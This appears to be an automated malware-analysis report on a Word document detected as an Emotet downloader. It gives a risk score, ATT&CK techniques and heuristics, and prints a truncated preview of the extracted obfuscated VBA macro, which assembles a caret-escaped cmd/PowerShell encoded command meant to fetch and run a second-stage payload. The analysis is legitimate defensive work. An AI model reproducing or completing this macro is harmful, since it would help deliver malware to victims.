MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file contains a VBA macro with an AutoOpen function, a common technique for Emotet. The macro constructs and executes a PowerShell command, which appears to be obfuscated and designed to download and run a second-stage payload. The ClamAV detection also strongly suggests Emotet.
Heuristics 5
-
ClamAV: Doc.Downloader.Emotet-6899213-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6899213-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 46571 bytes |
SHA-256: 656bdf585798e97b5c3c3ef5c7d44717808431b6e8dae0a6636d87c51abc8aa8 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "JoaOPaL"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "OrDtLXsUjiClp"
Function RKXCmdipXB()
On Error Resume Next
IsArray CDate(534)
LAbhA = zDbvl * qUMjj
cLYiAP = "mD" + " /v^:O^" + " ^ " + " " + "/r" + CStr(Chr(ZlQoajHzhIzP + wHQbBvBwU + 34 + ZnVIBtif + wwWPQNMqPz))
IsArray 98633 - 56508
LAbhA = Sin(5)
PmGhkrcO = "se^" + "T 2gR=p" + "^9we\" + "s^h^e" + "ll^ -e" + " J" + "A^BN" + "A,9^A^{" + "gA^+A" + "^,^[^"
LAbhA = SMKpGM + LWNtc
VarType Oct(QWrFqV - 87459)
VarType uVNAw * FTwEq
sIBZd = "A(Q^" + "B3^AC^" + "`^A$^" + "w" + "^B" + "^i" + "A,9" + "^A(^Q^B" + "j^A^HQ^" + "A^I^ABO" + "^A,UA" + "d" + "^AA^"
LAbhA = LCase(vpSCAq)
VarType wUwWXH * XwzsEu
VarType Sin(8489)
bwFCpL = "u^A^" + "Fc" + "A(^Q^B" + "^iAE" + "MA$A^"
IsArray CCur(74669 * ITVRkV)
VarType 88730 * 70644 - cSzusA / uBzLDK
LAbhA = CDate(44)
VarType DbqkmK * cnZQE
IsArray Cos(317)
hUVJGjHPjv = "B^p" + "^A^,^UA" + "^$^" + "gB`AD^s" + "A" + "J^A^BU"
IsArray Str(jDQCZY / zHUMq)
LAbhA = LCase(Qsrzi)
mdHHWTJzEwr = "A^H{" + "^A^" + "d" + "gA+^" + "ACc^Aa^" + "A^B" + "^`A" + "^" + "HQ^Ac^" + "A^A^" + "6^AC" + "8^AL^w" + "^"
VarType Atn(HquiQk)
KjQWdRlha = "BzA^,E^" + "A$gBv" + "^" + "AC^[Aa" + "^" + "Q^B" + "/^" + "AC8^AV" + "AB^"
VarType zFHSF / TECjAL + jQiwJt / MriYdI
LAbhA = jMktXk - DvwHi
VarType 92626 + TRBsd - InjJh * HiDTb
LAbhA = MpcfMB / YwBVf + fJDsL + RnQBwl
btJzHZKjLc = ".A^" + "," + "IA^a" + "^" + "gB(AD" + "^M^A$^" + "g^BA^" + "A,^gA" + "^d^"
VarType Month(uotDBN * Yivow)
IsArray Tan(26261 + VzkZr * vnOfji * fSJMJw)
IsArray Rnd(11274 / iozAW)
VarType CBool(MNrvi + KWsbX / DVnoMv + abLrVq)
nQrcVikWBz = "AB^`A" + "^HA^AO" + "g^AvAC" + "^8A(" + "^wB/A^H" + "U^" + "A^egBv" + "A,w^A^d" + "QB^i^" + "AC[^A" + "cgB^" + "1A" + "C"
RKXCmdipXB = cLYiAP + PmGhkrcO + sIBZd + bwFCpL + hUVJGjHPjv + mdHHWTJzEwr + KjQWdRlha + btJzHZKjLc + nQrcVikWBz
VarType Tan(kkslh)
End Function
Function QZVfIFDhQ()
On Error Resume Next
IsArray CStr(YvBWV)
VarType CBool(92794 * NNjTX)
VarType Sqr(33802 + JKrkpi)
HrRNDUhoih = "8A^Mw^B" + "QA^" + "H^I^A" + "^aQ^" + "B^U^A^F" + ".^A" + "^" + "QA" + "B^9^" + "AH^QA^d" + "A" + "B"
IsArray Str(bRqmw)
VarType 74556 / uzPbtV
IsArray vmIjl + vQrUz - 65198 + HEPZph
LAbhA = iuBzQI + DZwIz * 13156 * 45865
FEvGOawdhhE = "^" + "w^A^D9A" + "^Lw^AvA" + "^,{A$w^" + "B/A,U" + "^Ae^" + "A^B^" + "`^" + "A" + "^H^I^A" + "^" + "{^Q"
LAbhA = Str(kRrGj)
IsArray TypeName(7)
ZOSDu = "^B." + "^A,^.A" + "$g^BnA" + "^" + "," + "{Acg^" + "B^[^" + "AC" + "[" + "A$w"
IsArray bzsco / WIFlqJ
IsArray rvhuOl / SoorW - cSlvW * sjwYw
VarType Second(812)
VarType CVar(Vqinj)
iNWTjQr = "^" + "B/" + "^A," + "cA" + "^Lw^Bm"
LAbhA = 23399 - RVJBPB
VarType FvMMO - 12698 + 91623 + VrNii
LAbhA = zJzIX * vmAbas - 6336 * oVSmwo
LAbhA = nvhJL / oDEnQc * 52870 / sWjNAK
VarType CBool(8)
dNAwlJVRT = "^A" + "D^{^A" + "^" + "W" + "^Q^B/A" + "^,^.^A" + "Q^AB" + "^9AH^Q" + "^Ad" + "^ABw^A^"
LAbhA = CDate(58941 + iiUHp)
IsArray CCur(jurhXd)
IsArray CVar(45104 + EEwKSo)
MjiOIa = "D^9ALw^" + "AvA^,^E" + "^A" + "$" + "^" + "AB/A,U^" + "A^"
VarType VYFiC + DHjRA / onlcm / 81457
VarType ainIE / IXhLDo
LAbhA = bLIuI * HCVKlv
BtkZikvtjlw = "{Q" + "^B" + "^" + ".^" + "A^H^" + "." + "^A"
VarType WMZLjO - fwHuri * lcXQE * JihIz
LAbhA = CDate(Ubquw + TRsYu)
VarType CByte(16704 + iBIFVl)
VarType 5463 + zuBoN
IsArray 17292 / 54837
KFacI = "^aA^Bv" + "^A^H" + "MAd^A^" + "AuA,.^A" + "^dA^B^" + "9A^,.A" + "^$^g^" + "Bx^AC" + "[^A$" + "gB^lA" + "^H" + "^QAL^"
LAbhA = LCase(8)
VarType TimeValue(QEcVd * pjupX)
ouVBnoSHR = "wA^xA,^" + "I^A^W" + "^gB" + "A^A^," + "gAd^A^B" + "^`^A^H^" + "AAOg" + "A" + "v" + "AC^8^A"
IsArray HqYoo - RMdcvZ - DRWEtv * dbjJiM
LAbhA =
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.